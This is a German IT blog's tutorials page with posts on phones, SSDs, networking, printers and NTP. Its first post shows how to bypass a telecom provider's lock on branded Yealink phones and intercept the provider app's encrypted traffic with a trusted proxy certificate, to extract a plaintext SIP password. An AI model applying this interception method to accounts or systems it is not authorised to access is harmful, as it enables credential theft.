Category "Tutorials"

Ausführliche Tutorials für komplexere Lösungen

Swisscom Smart Business Connect mit TAPI nutzen

- - Allgemein, IT, Tutorials

Eine Smart Business Connect Lösung inklusive virtueller Telefonanlage von Swisscom via TAPI nutzen? Unmöglich? Nicht ganz. Mit Fingerspitzengefühl, Brecheisen und genug Geduld bringt man es zum laufen.

Das Problem

Die Swisscom liefert die Geräte bei einer virtuellen Telefonanlage im „branded“ – Zustand aus. Das heisst: Die originale Firmware der Geräte wurde verändert (ähnliches passiert auch mit bei Swisscom gekauften Mobiltelefonen). Neben dem Vorladen der Konfiguration (eine gute Sache) hat die Swisscom dabei aber auch den Administrativen Benutzer des Geräts gesperrt – was entsprechend nur eine eingeschränkte Konfiguration ermöglicht.

Bei Yealink Phones ist es konkret die „Action – URL“ die so nicht bearbeitet werden kann – und damit auch kein TAPI ermöglicht.

TAPI wird aber von vielen Fremdprogrammen eingesetzt um das Telefon mit z.B. einem ERP oder CRM zu verknüpfen (Auslöser für diesen Fall war die PROFFIX Telefonintegration).

Wer nun denkt, man bekomme diese Zugangsdaten per Swisscom – Support  / Partner liegt falsch. „Das ist nicht möglich“, „Diese Daten hat nur der Hersteller“, „Die gibt es nicht“  u.ä. sind nur einige der zwar kreativen aber leider falschen Antworten die man erhält.

In Wahrheit möchten Sie diese Daten wohl einfach nicht herausgeben.

Die Lösung

Die Lösung ist mehrstufig und etwas komplexer. Im Groben sind es aber zwei Schritte:

  • Swisscom Branded Firmware entfernen, Original Firmware von Yealink aufsetzen
  • Korrekte SIP – Credentials besorgen

Sollte bereits ein debranded / unbranded Gerät vorhanden sein, kann direkt zum Schritt Korrekte SIP – Credentials besorgen gesprungen werden.

Swisscom HD Phone Yealink debranden

TFTP – Server vorbereiten

Idealerweise installiert man sich den TFTP – Server tftpd64 – hier gibts die portable Version (empfohlen)

Diesen entpackt / installiert man und führt ihn aus. Anschliessend erstellt man einen Ordner (z.B. Firmware) und verweist unter Current Directory  tftpd64 auf diesen Ordner (hier kommt später die Firmware hinein).

Unter Server Interfaces wählt man das korrekte Netzwerkinterface aus (das mit einer IP…)

„Current Directory“ auf Firmware-Ordner verweisen, Korrektes Netzwerk Interface auswählen

 

Original Firmware Yealink besorgen

Der nächste Stolperstein; Yealink stellt nur einen Teil der benötigten Firmware online zur Verfügung, welche für das Debranding nicht ausreichen.

Zum Glück findet man die passenden Files nach einigem Googlen:  Hier gibts die Yealink Recovery Firmware als Mirror

Je nach Modell (Yealink T46, T41, T42 oder T48) entpackt man das entsprechende Verzeichnis nun und kopiert den Inhalt in den im vorherigen Schritt erstellten Ordner Firmware.

 

Original Firmware flashen

Aufgrund fehlender Berechtigungen funktioniert das Flashen der Firmware nicht über den Webclient. Entsprechend muss das Yealink in den Recovery Mode versetzt werden. Das erreicht man wie folgt:

Für die gesamte SIP-Serie:

  1. Yealink vom Strom trennen (Ausstecken!)
  2. Lautsprechersymbol lange drücken und halten
  3. Wieder mit Strom verbinden

Auf dem Yealink muss anschliessend die IP – Adresse des TFTP – Servers angegeben werden. Diese entspricht in der Regel dem Server Interface aus dem ersten Schritt („TFTP – Server vorbereiten“). Anschliessend bestätigen – ist alles in Ordnung sieht das wie folgt aus:

Yealink Firmware Debranding

 

Nach erfolgtem Update empfiehlt sich das Yealink erneut mit der aktuellsten Firmware zu flashen (für T46 z.B. hier erhältlich):

yealink web upgrade

Auf dem Yealink selbst sieht das Ergebnis dann wie folgt aus:

Yealink Firmware Update

Sobald das abgeschlossen ist hat man ein aktuelles, unbranded Yealink mit sämtlichen Berechtigungen (Standarduser / Passwort: admin / admin)

Korrekte SIP – Credentials besorgen

Bei den Angeboten Business Telefonie kann man die SIP – Credentials direkt im Swisscom Kundencenter anfordern. Bei Smart Business Connect mit virtueller Telefonanlage (bzw. wie die Lösungen sonst noch heissen) klappt das nicht so einfach.

Die Lösungsidee dafür ist, dass egal wie viele Softclients, Apps etc. die Swisscom noch „vor die Lösung“ schaltet – schlussendlich doch immer eine gewöhnliche SIP – Verbindung dahinter steht.

Swisscom Client besorgen

Grundsätzlich sollte die Lösung mit jedem Client möglich sein – der Einfachheit halber verwenden wir aber den Windows Client alias Business Communication App.

Sobald dieser installiert ist besorgt man sich die Zugangsdaten aus dem Swisscom Kundencenter (Format: ***@***.join.swisscom.ch, Passwort scheint meist 8-stellig zu sein).

Business Communication App

Hier unbedingt ausprobieren, ob der Login funktioniert. Falls nicht, dafür sorgen, dass er funktioniert. Das ist die Grundvoraussetzung für die nächsten Schritte.

Anschliessend in der Business Communication App unter Einstellungen –> Erweitert den Haken setzen bei System-Proxy verwenden. Dann die Software schliessen (wichtig!).

Einfach einmal zuhören…

Der letzte Schritt ist das Sniffen des Netzwerktraffics – oder auf deutsch; Einfach einmal zuhören, was denn die Business Communication App so zu sagen hat…

Da die Verbindung über SSL läuft funktioniert das mit Standardtools wie Wireshark etc. nicht auf Anhieb. Einfacher gehts mit Charles Proxy.

  1. Charles Proxy hier herunterladen und installieren (30-Tage Demo reicht)
  2. Charles öffnen

Nun muss das Root – Zertifikat von Charles installiert werden (Wichtig: Unter Vertrauenswürdige Stammzeritfizierungsstellen installieren, sonst klappts nicht) :

Charles Proxy SSL Cert

Charles Proxy Root Certificate installieren. Wichtig: Unter Vertrauenswürdige Stammzertifizierungsstellen installieren

 

Nun muss das System noch so konfiguriert werden, dass sämtlicher Traffic über Charles Proxy läuft. Dazu Internetoptionen öffnen und folgende Einstellungen vornehmen:

System Proxy einstellen

Nun ist alles bereit um „zuzuhören“. Die Business Communication App sowie Charles können nun beide wieder geöffnet werden. Bei Charles startet man die Aufzeichnung des Traffics über den Record – Button in der linken oberen Ecke.

Listen Charles

 

Anschliessend kann man sich an der Business Communication App anmelden – in Charles sollten zeitgleich einige Anfragen auftauchen. Konkret interessiert uns dabei das config.xml unter folgendem Endpunkt:

Swisscom Business Creds

Nach etwas Suchen im entsprechenden XML findet man das gewünschte SIP-Passwort als Klartext (über Wireshare würde man hier nichts sehen, da SSL).

Dieses Passwort in Kombination mit dem Benutzernamen (der übrigens auch im config.xml steht) ermöglicht nun alle möglichen Geräte an die virtuelle Telefonanlage von Swisscom anzuschliessen – unabhängig von „Branded Devices“, irgendwelchen Softclients und ähnlichem.

Put it all together

Wir haben nun ein Gerät mit Originalfirmware und vollen administrativen Befugnissen sowie funktionierende SIP – Credentials. Zeit alles zusammenzuführen:

Yealink Final Config

Mit der Endziffer „-01“ des Benutzernamen kann etwas gespielt werden. Wenn’s nicht funktioniert einfach 00 oder 02 daraus machen…

Anschliessend alles testen – wenn sowohl ankommende als auch abgehende Anrufe funktionieren und auch evtl. Drittgeräte noch funktionieren ist alles in Ordnung.

Damit TAPI auch tatsächlich funktioniert und man Smart Business Connect auch mit Fremdlösungen wie z.B. der PROFFIX Telefonintegration einsetzen kann braucht es nun eigentlich nur noch die Software Phonesuite welche mit dem Yealink verknüpft wird.

Die Einrichtung derselben ist aber dank der vollen Administrativen Berechtigungen nun kein Problem mehr.

 

Windows 10 für SSD optimieren

- - IT, Tutorials

Grundsätzlich funktioniert Windows 10 mit einer SSD meist problemlos. Trotzdem gibt es eine Reihe von Möglichkeiten um Windows für den SSD – Betrieb zu optimieren und die Lebensdauer derselben zu verlängern.

Wieso optimieren?

Eine SSD ist zwar auch „nur ein Speichermedium“, im Gegensatz zu einer herkömmlichen Festplatte verfügt diese aber über einige Unterschiede. Aus folgenden Gründen lohnt sich deshalb eine Optimierung:

  • Verlängern der Lebensdauer der SSD durch Vermeidung von unnötigen Schreibzyklen
  • Vermeiden von Redundanzen
  • Erhöhen der Lese- und Schreibgeschwindigkeit der SSD
  • Vermeiden von „Flaschenhälsen“ und optimale Nutzung der SSD

Optimierung einer SSD unter Windows

Korrekter Einbau und Anschluss

Die meisten SSDs unterstützen Übetragungsraten von bis zu 6 GBit/s. Sollte die SSD nachträglich nachgerüstet worden sein, macht es also Sinn auch den korrekten Anschluss zu verwenden (SATA 6G). Auf dem Mainboard sind diese „schnelleren Anschlüsse“ meist mit dem Kürzel 6G markiert.

Zusätzlich muss im BIOS des Systems für den entsprechenden Anschluss unbedingt der AHCI-Modus aktiviert werden (anstelle IDE / RAID).

Platz frei lassen

Idealerweise lässt man auf der SSD etwas Platz (ca. 20 %) frei, damit diese sich selbst reorganisieren kann. Es empfiehlt sich nicht, die SSD bis aufs Maximum zu befüllen.

Kein Defragmentieren

Das Defragmentieren einer SSD ist nicht nur unnötig sondern auch der Lebensdauer abträglich. Sofern Windows die Festplatte als SSD erkennt, wird die Defragmentierfunkion automatisch deaktiviert; ansonsten kann diese wie folgt manuell abgeschaltet werden:

  1. Laufwerke defragmentieren und optimieren öffnen
  2. Prüfen ob das Laufwerk und Medientyp als Solid-State-Laufwerk eingetragen ist
  3. Prüfen ob die Optimierung auf Aus gestellt ist

SSD optimieren

 

Windows Indizierung deaktivieren

Auf einer herkömmlichen Festplatte macht die Indizierung Sinn, auf einer SSD hingegen werden dadurch unnötigte  Schreib- und Lesezyklen generiert. Die Windows Indizierung sollte deshalb deaktiviert werden. Dazu wie folgt vorgehen:

  1. Rechtsklick auf das entsprechenden Laufwerk (z.B. C:)
  2. Eigenschaften auswählen
  3. Den Haken bei Zulassen, dass für Dateien auf diesem Laufwerk…indiziert werden entfernen

SSD Indizierung deaktivieren

Ruhezustand deaktivieren

Für herkömmliche Festplatten kann der Start aus dem Ruhezustand einen erheblichen Geschwindigkeitsvorteil bringen. Bei einer SSD hingegen nutzt er wenig bis gar nichts, da diese bereits sehr schnell ist. Durch das Deaktivieren des Ruhezustands kann auf der SSD Platz gespart werden:

  1. Eingabeaufforderung als Administrator ausführen
  2. powercfg -h off eingeben und mit Enter bestätigten

Superfetch deaktivieren

Die Funktion Superfetch bringt bei der hohen Geschwindigkeit einer SSD keinen Vorteil, sondern benötigt im Gegenteil eher mehr Zeit. Sie kann deshalb wie folgt deaktiviert werden:

  1. Dienste öffnen
  2. Den Dienst Superfetch suchen und per Doppelklick öffnen
  3. Den Starttyp auf Deaktiviert setzen
  4. Auf Übernehmen klicken, dann auf OK klicken

Disable Superfetch

Auslagerungsdatei auf herkömmliche Festplatte verschieben

Falls neben der SSD auch noch eine herkömmliche Festplatte verwendet wird, sollte die Auslagerungsdatei des Systems auf dieselbe verschoben werden.

  1. System -> Erweiterte Systemeinstellungen öffnen
  2. Unter dem Abschnitt Leistung den Button Einstellungen anklicken
  3. Im folgenden Fenster unter Erweitert im Abschnitt Virtueller Arbeitsspeicher den Button Ändern anklicken
  4. Den Haken bei Auslagerungsdateigrösse für alle Laufwerke automatisch verwalten deaktivieren.
  5. Für das Laufwerk mit SSD den Haken bei Keine Auslagerungsdatei setzen.
  6. Für das Laufwerk mit der gewöhnlichen Festplatte den Haken bei Grösse wird vom System verwaltet setzen.
  7. Übernehmen und mit OK bestätigen
  8. Computer neustarten

Systemeigenschaften SSD Windows

Mobiles Internet und Fernzugriff

- - IT, Tutorials

Das mobile Internet hat auch den Fernzugriff verändert. Wo früher noch ein erheblicher Aufwand für eine Verkabelung betrieben werden musste, reicht heute ein simples LTE-Modem. Wirklich?

Den einfachsten Fall erleben wir selbst tagtäglich. Surfen wir etwa mit dem Mobiltelefon im Netz per 3G / 4G oder LTE so sind wir nicht „direkt im Netz“ sondern erreichen dieses via das Interne Netzwerk des Providers, der zu diesem Zweck auch eine eigene Firewall bereitstellt.

Der normale Benutzer bemerkt davon aber nichts – es funktioniert ja alles.

LTE Modem Internetzugriff

Zugriff vom LTE-Modem ins Web; Alles funktioniert.

Kehrt man das Ganze aber um und möchte das Mobiltelefon bzw. das LTE-Modem von extern erreichen (z.B. für Fernsteuerung von Geräten, Fritz Smart Home) wird das in den wenigsten Fällen auf Anhieb funktionieren. Der Grund dafür; die unterschiedlichen Netzwerke („Internet“ vs. „Internes Netzwerk d. Providers“) die durch die Providerfirewall getrennt sind.

LTE Modem Fernzugriff

Zugriff vom Web aufs LTE-Modem ins Web; Firewall des Providers blockiert.

Gründe?

Die Gründe, wieso nicht jedes Mobiltelefon mit einer öffentlich ansprechbaren IP-Adresse unterwegs ist sind vor allem bei den Kosten und der Sicherheit zu suchen.

Zum einen braucht der Provider wesentlich weniger öffentliche IP-Adressen (Sind nicht gratis…) was im Zuge der heutigen Mobilisierung oftmals auch gar nicht mehr möglich wäre (d.h.; zu wenige IP-Adressen).

Zum anderen ist es auch eine Sicherheitsfrage. Wenn jedes Mobiltelefon mit einer öffentlichen IP-Adresse direkt ansprechbar wäre, gäbe es über kurz oder lang ein Chaos apokalyptischen Ausmasses. Jedes verpasste Update auf dem Smartphone würde eine potenzielle Sicherheitslücke darstellen, die per Web direkt angesprochen und ausgenutzt werden könnte.

 

Lösung

Nun gibt es aber Fälle, wo das LTE-Modem (z.B. eine Fritzbox) über eine öffentliche IP-Adresse verfügen muss. Denn selbst Dienste wie dyndns.org, noip.com oder myfritz.net benötigen zur korrekten Weiterleitung eine solche Adresse.

In der Schweiz bekommt man Sie für die entsprechenden Geräte jeweils nur auf Anfrage beim Provider:

  • Sunrise; kurze Anfrage bei der Support-Hotline
  • Swisscom; spezieller Zugang (Corporate Application Access) nötig

Sicheres Gästenetzwerk mit DD-WRT

- - IT, Tutorials

Es gibt viele Gründe ein Gäste-WLAN einzurichten. Im einfachsten Fall möchte man tatsächlich Gästen oder Besuchern eine Internetverbindung zur Verfügung stellen. Vielleicht möchte man aber auch einfach ein getrenntes WLAN-Netz um z.B. Haustechnik oder Solaranlagen anzuschliessen. Wie man das Ganze so einrichtet, dass Besucher nicht plötzlich im internen Netz landen – in diesem Artikel.

Gästenetzwerk vs. Sicheres Gästenetzwerk

Ein unsicheres Gästenetzwerk aufzubauen ist einfach – viele WLAN-Router haben diese Funktion heute bereits eingebaut.
Der Haken daran: Es ist nicht sicher und ermöglicht „Gästen“ praktisch auf das gesamte interne Netzwerk zuzugreifen. Die Ursache liegt aber weniger an der Software sondern vielmehr  an der „Standardverkabelung“.

Die Problematik; Hersteller vs. Provider

Aktuelle WLAN-Router haben meist auch einen WAN – Anschluss, d.h. sie sind darauf ausgelegt direkt ans „Internet“ angeschlossen zu werden. Vom Provider erhält man heute zu 99,9 % aber ebenfalls einen Router (eine Modem / Router Kombination…)

Man hat damit also folgende zwei Anschlussmöglichkeiten:

Variante 1: Der Router des Providers (z.B. von Swisscom) wird komplett aus der Installation entfernt und durch den WLAN-Router ersetzt. Der WLAN-Router stellt sowohl das Interne WLAN wie auch das Gästenetzwerk.

WAN / WLAN Direkt

Abb. 1: Vom Hersteller vorgesehene Konfiguration („Theorie“…)

Variante 2: Ein zusätzlicher WLAN-Router wird an das bestehend bleibende Modem/Router des Providers angeschlossen. Der WLAN-Router stellt ebenfalls sowohl Internes WLAN wie auch das Gästenetzwerk.

WAN / WLAN Indirekt

Abb. 2: Häufiger anzutreffende Konfiguration („Praxis“…)

Bei beiden Varianten wird „der Internetzugang“ funktionieren – denn der/die Router machen was sie sollen und vermitteln „jeden mit jedem“. Dementsprechend hat aber bspw. auch ein Gast vollständigen Zugriff auf sämtliche Komponenten des Netzwerks. Das ist nicht im Sinne des Erfinders, oder?

Eine saubere Lösung mit DD-WRT

Um das Gästenetzwerk wirklich sauber einzurichten braucht man wesentlich mehr Kontrolle über den WLAN-Router, als standardmässig vorgegeben. Gerade für kleinere Netzwerke empfiehlt sich deswegen die alternative Routerfirmware DD-WRT.

DD-WRT ersetzt dabei die beschränkte Standardfirmware des Herstellers und ermöglicht wesentlich mehr Features und Feineinstellungen (mehr Infos zu geeigneten Routern bzw. die Installation von DD-WRT findet man hier)

Das endgültige Ergebnis sieht dann in etwa so aus:

Sicheres Gästenetzwerk mit DD-WRT

Abb.3: Sicheres Gästenetzwerk mit DD-WRT

Anders als bei den vorhergehenden Beispielen (Abb. 1 und 2) erfolgt hier eine vollständige Trennung von Internem und Gästenetzwerk – und zwar bereits auf demWLAN- Router. Gleichzeitig wird hier auch ein direkter Zugriff vom Gästenetz auf alle Router unterbunden – einzig und allein ein „kontrollierter Internetzugang“ wird erlaubt.

Schritt 1: Virtuelles Gästenetz erstellen

Virtuelles Interface erstellen

Virtuelles Interface erstellen (in DD-WRT)

Zuerst wird in DD-WRT ein neues, virtuelles Interface für den WLAN – Zugang erstellt. Dieses wird ausschliesslich für den Gästenzugang genutzt (z.B. WLAN_Gast).

Vorgehen: Unter Wireless >> Basic Settings den Button „Add“ klicken

Schritt 2: WLAN verschlüsseln / mit Passwort schützen

WLAN absichern

WLAN Intern/Gästenetz absichern

Anschliessend sollte man die grundlegenden Sicherheitseinstellungen für beide WLAN-Zugänge konfigurieren. Das Gästenetzwerk offen (d.h. ohne Verschlüsselung) zu lassen, empfiehlt sich in den meisten Fällen nicht.

Vorgehen: Unter Wireless >> Wireless Security die Verschlüsselung für beide Interfaces konfigurieren.

Schritt 3: Bridge erstellen

Neue Bridge erstellen

Neue Bridge br1 für das virtuelle Interface erstellen

Nun muss eine Bridge für das in Schritt 1 erstellte virtuelle Interface erstellt werden. Wichtig! Die bereits bestehende Bridge br0 nicht ändern, löschen oder überschreiben!

Vorgehen: Unter Setup >> Networking >> Create Bridge „Add“ klicken und die IP-Einstellungen für das Gästennetzwerk definieren. Anschliessend unter dem Punkt „Assign to Bridge“ das virtuelle Interface der neu erstellten Bridge zuweisen.

Schritt 4: Neue DHCP Instanz erstellen

Neue DHCP Instanz erstellen

Der Bridge br1 eine neue DHCP Instanz zuweisen

Da Gäste automatisch eine IP-Adresse zugewiesen bekommen sollen, muss eine neue DHCP – Instanz erstellt werden.

Vorgehen: Unter Setup >> Networking >> Multiple DHCP Server mittels des Buttons „Add“ der neu erstellten Bridge eine DHCP – Instanz zuweisen.

Schritt 5: Zusätzliche DNSMasq Optionen konfigurieren

Zusätzliche DNSMasq Optionen

Zusätzliche DNSMasq Optionen setzen

Damit DHCP schlussendlich funktioniert müssen noch folgende Optionen unter „Additional DNSMasq Settings“ ergänzt werden.

# Aktiviert DHCP auf br1
interface=br1
# Setzt das Standard Gateway für Clients von br1
dhcp-option=br1,3,192.168.5.1
# Setzt den DHCP Bereich und Default Lease Time für br1
dhcp-range=br1,192.168.5.100,192.168.5.150,255.255.255.0,24h

Schritt 6:  IPTables konfigurieren

IPTables Konfiguration DD-WRT

IPTables Konfiguration einfügen und „Save Firewall“ klicken

Zu guter Letzt müssen noch die Firewallregeln des Routers konfiguriert werden. Bis zu diesem Punkt hat das Gastnetzwerk auch noch keinen Internetzugang (das eigentliche Ziel dieser Übung…)

Firewallregeln kann man in DD-WRT mithilfe von IPTables konfigurieren. Man findet die entsprechende Eingabemaske unter Administration >> Commands.  Dort sollen folgende Konfigurationseinstellungen eingefügt und mittels „Save Firewall“ gespeichert werden:

#br1 (Gaestewlan) Internetzugriff erlauben
iptables -I FORWARD -i br1 -m state --state NEW -j ACCEPT
iptables -I FORWARD -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu
#Zugriff zwischen Intern und Gaeste blockieren
iptables -I FORWARD -i br0 -o br1 -m state --state NEW -j DROP
iptables -I FORWARD -i br1 -d `nvram get lan_ipaddr`/`nvram get lan_netmask` -m state --state NEW -j DROP
#NAT erlaubt Internetverbindung
iptables -t nat -I POSTROUTING -o br0 -j SNAT --to `nvram get lan_ipaddr`
#Torrent und P2P Netzwerke blockieren
iptables -I FORWARD -p tcp -s 192.168.5.0/24 -m connlimit --connlimit-above 50 -j DROP
iptables -I FORWARD -p ! tcp -s 192.168.5.0/24 -m connlimit --connlimit-above 25 -j DROP
#Direktzugriff auf Router aus Gaestenetzwerk verweigern
iptables -I INPUT -i br1 -p tcp --dport telnet -j REJECT --reject-with tcp-reset
iptables -I INPUT -i br1 -p tcp --dport ssh -j REJECT --reject-with tcp-reset
iptables -I INPUT -i br1 -p tcp --dport www -j REJECT --reject-with tcp-reset
iptables -I INPUT -i br1 -p tcp --dport https -j REJECT --reject-with tcp-reset

Schritt 7: DD-WRT in Netzwerk einbinden

DD-WRT einbinden

DD-WRT ins bestehende Netzwerk einbinden

Zum Schluss muss der Router mit DD-WRT noch ins bestehende Netzwerk eingebunden werden. Da die Internetverbindung in dieser Konfiguration durch einen anderen Router / Modem (vergl. Abb. 3) hergestellt wird, brauchen wir das WAN nicht. Es sollte deshalb deaktiviert werden (unter „Setup“). Anschliessend sollte man dem Router noch eine plausible IP-Adresse vergeben (z.B. 192.168.1.2), sowie die Subnetmask und den DNS-Server ergänzen.

Den DHCP Server sollte man auf „Disable“ stellen – fürs interne Netzwerk brauchen wir ihn nicht und fürs Gästenetzwerk haben wir ihn bereits manuell konfiguriert.

Erst nachdem diese Einstellungen ergänzt wurden auf „Apply Settings“ klicken.

Um die Konfiguration abzuschliessen sollte man den Router anschliessend neu starten.

Kostenstellen importieren mit PAGESCOPE (Konica Minolta)

- - IT, Tutorials

Drucker / Kopierer mit Kostenstellen sind mehr als nützlich. Sie erlauben die exakte Zuweisung und Verrechnung von Druckkosten an Kunden. Die Pflege der Kostenstellen erweist sich dann aber meist als mühsam – denn wer gibt schon gerne ellenlange Listen auf den suboptimalen Druckertasten ein?

Die Idee

Die Idee einer Kostenstelle ist schnell erklärt. Für jeden Auftrag, Prozess und/oder Kunde druckt man auf eine vorgegebene Nummer. Nach Abschluss der Arbeiten kann dann eine Liste mit den entsprechenden Kopien ausgedruckt und verrechnet werden. Neben der Übersicht und Kostentransparenz erhält man dadurch interessante Werte für die Kalkulation (Jährliche Druckkosten, Drucke/Kunde,…).

Das Problem

Zwar können die Kostenstellen meistens direkt am Kopierer/Drucker angepasst werden, das Eintippen auf den „kleinen Tasten“ erweist sich aber meist als mühsam.

Bei neueren Kopierern besteht zwar die Möglichkeit, Kostenstellen per Weboberfläche anzupassen, doch auch das ist nicht immer ideal. Manuelles „Eintippen“ von mehr als 10 Kostenstellen ist mühsam, zeitaufwändig und fehleranfällig.

Eine bessere Lösung muss her!

Pagescope?

Die von Konica Minolta angebotene Lösung für das Problem heisst Pagescope und ist zum grössten Teil kostenlos. Von der Verwaltung eines einzelnen Kopierers bis hin zur Administration von Dutzenden von Geräten kann eigentlich alles damit erledigt werden – ideal also für eine zentrale Verwaltung.

Hinweis: Für grössere Projekte empfiehlt sich die Intranetapplikation „Pagescope Net Care Device Manager“. Bei kleineren Projekten bzw. sporadischem Gebrauch ist man mit „Pagescope Data Administrator“ wesentlich besser bedient.

Eine Übersicht bzw. Download der entsprechenden Tools findet man hier.

Benötigte Daten aufbereiten

Die benötigten Daten (Kostenstellen) sind meistens bereits in irgendeiner Form vorhanden. Ob nun etwa in Form von Kundennummer und Kunde oder aber bereits als Auftragsliste mit der dazugehörigen Auftragsnummer, das Prinzip ist immer das Gleiche:
Nummer (Kostenstelle)  –> Name

CSV Trennzeichen getrenntDiese Daten müssen als csv. – File aufbereitet werden wofür sich Microsoft Excel hervorragend eignet. Beim Export der Daten einfach darauf achten, dass der Dateityp „CSV (Trennzeichen getrennt)“ ausgewählt ist.

 

Hinweis: Da auf den jeweiligen Geräten der Display meist begrenzt ist, sollten auch die Kostenstellennamen kurz gehalten werden. Bei Pagescope sind diese auf max. 20 Stellen begrenzt.

Pagescope installieren

Die Software Pagescope eignet sich für Kopierer von Konica Minolta. Allerdings bieten auch andere Hersteller ähnliche Tools an; der Ablauf ist dabei immer ähnlich und basiert auf den selben Grundlagen.

Die Installation von Pagescope ist daher auch nicht weiter schwierig – benötigte Zusatzpakete („Device Manager“) werden automatisch installiert, den Rest erledigt der Assistent.

Kostenstellen importieren

PAGESCOPE KostenstellenpflegeIn Pagescope selbst erreicht man über die „Kostenstellenpflege“ die relevanten Optionen für einen sauberen Import. Man sollte auf jeden Fall das entsprechende Gerätepasswort bereithalten (Standardpasswort Konica Minolta: 12345678), da nur dadurch ein Zugriff auf den Kopierer möglich ist.

 

Pagescope KostenstellenmethodeAuch hier erledigt wiederum der Assistent einen grossen Teil der Arbeit. Einziger Knackpunkt ist der Entscheid über die Kostenstellenmethode bzw. deren Authentifizierung. Wer Druck / Kopieraufträge lediglich sauber zuordnen möchte ist mit der (einfacheren) Methode (Authentifizierung ausschliesslich über Kontokennwort) besser bedient.

 

 

Pagescope Import aus einer DateiAnschliessend liest Pagescope die aktuellen Kostenstellen (falls vorhanden) aus. Hier besteht auch die Möglichkeit veraltete Einträge einfach und schnell zu löschen bzw. zu bearbeiten.

 

 

 

Pagescope Import aus einer DateiIn diesem Fenster kann man (endlich?) das vorbereitete csv. – File importieren. Der Vorgang ist an sich selbsterklärend; File importieren, entsprechende Spalten zuordnen, überprüfen und bestätigen. Sollten beim Import Fehler auftreten liegt das entweder an einem falschen Gerätepasswort, falschem Dateityp (.csv?) oder zu langen Kostenstellennamen.

 

Abschliessende Überlegungen

Tools wie Pagescope ermöglichen neben dem einfachen Import/Export von Kostenstellen auch die Delegation der Kostenstellenpflege an Mitarbeiter. Nach der Grundeinrichtung erfolgt die Verwaltung verhältnismässig einfach und Kostenstellen können direkt und zeitnah aktualisiert werden. Wer mehr als einen Kopierer mit denselben Kostenstellen verwendet kann auf einen Schlag sämtliche Daten bearbeiten – ideal!

NTP korrekt konfigurieren

- - IT, Tutorials

Zeit ist relativ – dem einen kann es nicht schnell genug gehen, der andere möchte sie anhalten. Für IT – Systeme hingegen sollte man sich darauf verlassen können, dass die Zeit stimmt und überall gleich ist – sonst können unangenehme Überaschungen passieren…

NTP – klein aber fein

Das Network Time Protocol ( NTP) ist ein Standard um die Zeit auf verschiedenen IT-Systemen zu synchronsieren. Computer, Server, Router, SAN, NAS – alles kann via NTP auf die gleiche Zeit abgestimmt werden.  NTP funktioniert über das Protokoll UDP und ist damit universell einsetzbar.

Wieso braucht es eine Zeitsynchronisierung?

Auf den ersten Blick mag es unerheblich scheinen, dass beispielsweise ein Router, PC oder Server kleine Zeitdifferenzen aufweisen. Und was sollen Unterschiede von 1-2 Minuten denn schon gross ausmachen…oder?

Je nach System sind es aber gerade diese Differenzen, die für kleinere Timeouts bis zum kompletten Versagen führen. Ein Hauptgrund für die Wichtigkeit der Zeit in IT – Systemen ist schlichtweg, dass praktisch alles darauf basiert. Einige Beispiele:

  • Backup (zeitgesteuert)
  • Verschlüsselung
  • DHCP (bis wann ist eine Adresse gültig?)
  • Updates
  • Sicherheitsfunktionen (z.B. zweistufige Authentifizierung)

Insbesondere der Bereich Netzwerk setzt eine Zeitsynchronität voraus – falls diese nicht  gegeben ist, wird sich das früher oder später bemerkbar machen.

NTP Server

Ein NTP Server macht nichts anderes, als dass er „die Zeit verteilt“. Er bringt verbundene Geräte auf den korrekte Zeitstand. Dabei spielt es grundsätzlich keine Rolle ob die Zeit, die er verteilt auch korrekt ist. Solange sie im System synchron (d.h. alle gleich) ist, sollte alles funktionieren. Natürlich ist es aber ein Unsinn, falsche Werte zu  synchronisieren.  Deswegen bezieht ein NTP Server die Zeit meistens von einem „Master“ NTP Server (siehe www.pool.ntp.org)

InternetzeiteinstellungenBei einzelnen Arbeitsstationen die direkt am Internet hängen, wird die Zeit standardmässig direkt mit einem Internetzeitserver konfiguriert. Dazu einfach in die Einstellungen für „Datum und Uhrzeit“ gehen und nach einem Punkt „Internetzeit“  suchen.

 

Bei Domänennetzwerken wird die Sache schon interessanter. Generell wird hier die Zeit vom ersten Domänencontroller einer Gesamtstruktur übernommen. Dieser wiederum bezieht seine Zeit von der BIOS – Systemuhr. Um nun aber die Zeit mit einem exakten, externen Zeitserver zu synchronisieren reichen einige Zeilen Powershell.  Für Server 2012 lauten diese z.B:

w32tm /config /manualpeerlist:pool.ntp.org /syncfromflags:MANUAL
Stop-Service w32time
Start-Service w32time

Im ersten Schritt wird dem DC mitgeteilt woher er seine Zeit beziehen soll (in diesem Fall von pool.ntp.org). Danach wird der Service mittels Stop / Start neu gestartet.

Hinweis: In einer virtualisierten Umgebung sollte man vorher unbedingt die Zeitsychronisierung mit dem Host deaktivieren.

Nun muss die korrekt Zeit noch mit den einzelnen Domänenclients synchronisiert werden. Dazu eignet sich bspw. DHCP.

Zeit per DHCP verteilen

Unter Server 2012 findet sich die Funktion bei „DHCP“ > „IPv4“ und/oder „IPv6“ > „Serveroptionen“. Dort den Haken bei „004 Zeitserver“ setzten und den entsprechenden NTP Server (in diesem Beispiel der DC)  angeben.

Damit wird die korrekte Zeit automatisch synchronsiert – d.h. sämtliche Geräte die per DHCP ihre IP-Adresse beziehen und in die Domäne eingebunden sind, beziehen die Zeit per sofort vom DC.

Webseite gehackt – Was nun?

- - Tutorials, Web

Dass grosse Webseiten gehackt werden ist bekannt. Doch was passiert wenn die eigene Webseite plötzlich ungebetene Gäste hat? Woher kommen sie? Und wie verhindert man das Schlimmste?

Betroffene Systeme

Sollten Sie nur statische HTML Seiten als Grundlage für Ihre Webseite verwenden (erkennbar an der Endung einzelner Seiten, z.B. meineseite.ch/kontakt.html) besteht ein geringes Risiko, dass Sie gehackt werden. Sobald Sie aber mit dynamischen Seiten, also z.B. CMS-Lösungen wie WordPress, Joomla etc. arbeiten und im Hintergrund eine Datenbank liegt besteht ein erhöhtes Risiko, dass Sie einem Hackerangriff zum Opfer fallen.

Die Aussage, dass verbreitete CMS-Lösungen verwundbarer als Einzellösungen sind ist aber dennoch nicht richtig. Zwar sind häufig verwendete CMS-Systeme interessanter für Angreifer, andererseits werden Lücken und Fehler auch wesentlich schneller bemerkt und geschlossen. Sofern Ihr CMS entsprechend gewartet und aktualisiert wird reduziert sich das Risiko daher erheblich.

Riskofaktoren

Passwörter

Die übliche Sicherheitslücke gilt auch für Webseiten. Verwenden Sie sichere Passwörter – lang und kompliziert 😉 Als Alternative dazu eignet sich eine zweistufige Authentifzierung wie sie es vielleicht vom E-Banking her kennen. Google bietet dazu mit dem Google Authenticator eine interessante Lösung.

